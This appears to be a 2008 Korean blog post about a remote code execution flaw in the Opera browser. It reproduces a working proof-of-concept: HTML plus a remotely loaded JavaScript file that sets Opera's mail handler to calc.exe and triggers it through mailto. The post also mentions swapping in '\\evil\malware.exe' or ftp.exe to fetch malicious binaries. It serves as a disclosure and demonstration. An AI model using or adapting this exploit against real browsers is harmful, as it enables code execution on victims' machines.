태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

Opera 웹브라우져 - 원격 코드 실행 취약점

┃ Application 2008.10.27 08:45

HTTP Proxy 변환 대신, 공격자는 "\\evil\malware.exe "나 로컬 명령으로 기본 외부 메일어플리케이션을 바꿀 수 있습니다.(예를 들면, 원격에서 악성 바이너리를 다운로드 하기 위해 사용될 수 있는 ftp.exe) “2”로 설정하여 “Mail Handler"를 바꾸면 오페라는 기본 오페라 메일 애플리케이션 대신 외부 메일 애플리케이션이 실행됩니다.

설정을 바꾼 후, 공격자는 간단하게 코드를 실행하기 위해 “mailto:”로 위치를 설정할 수 있습니다.

윈도우즈 계산기를 실행하는 소스를 다음 링크에서 찾을 수 있습니다.
http://raffon.net/research/opera/history/op.html

링크된 페이지로 가 소스코드를 보았더니 다음과 같습니다.
<html>
<title>bb</title>
<script>
var z=null;
function x() {
  window.setTimeout("z=window.open('opera:historysearch?q=%2A');window.focus();",1500);
  window.setTimeout("z.close();",3000);
  window.setTimeout("location.href='mailto:'",3000);
}
</script>
<body>
<a href="#<script src='
http://www.raffon.net/research/opera/history/o.js'></script>" target="_blank" onclick="x()">Click me...</a>
</body>
</html>



링크된 파일 o.js를 다운로드받아 들여다 보았더니 다음과 같았습니다.
s=document.createElement("IFRAME");
s.src="opera:config";
document.body.appendChild(s);
s.src="javascript:opera.setPreference('Mail','External Application','c:\\\\windows\\\\system32\\\\calc.exe');opera.setPreference('Mail','Handler','2');parent.window.close()";


위의 코드 실행으로 기본 메일 프로그램이 윈도우 계산기로 바뀌어 실행되는 것을 확인하였습니다.

최신 버전 9.61에서는 패치가 되었는지 되지 않네요.
Trackbacks 0 : Comments 0

Write a comment

◀ PREV : [1] : [2] : [3] : [4] : [5] : [6] : [7] : [8] : [9] : [10] : [···] : [22] : NEXT ▶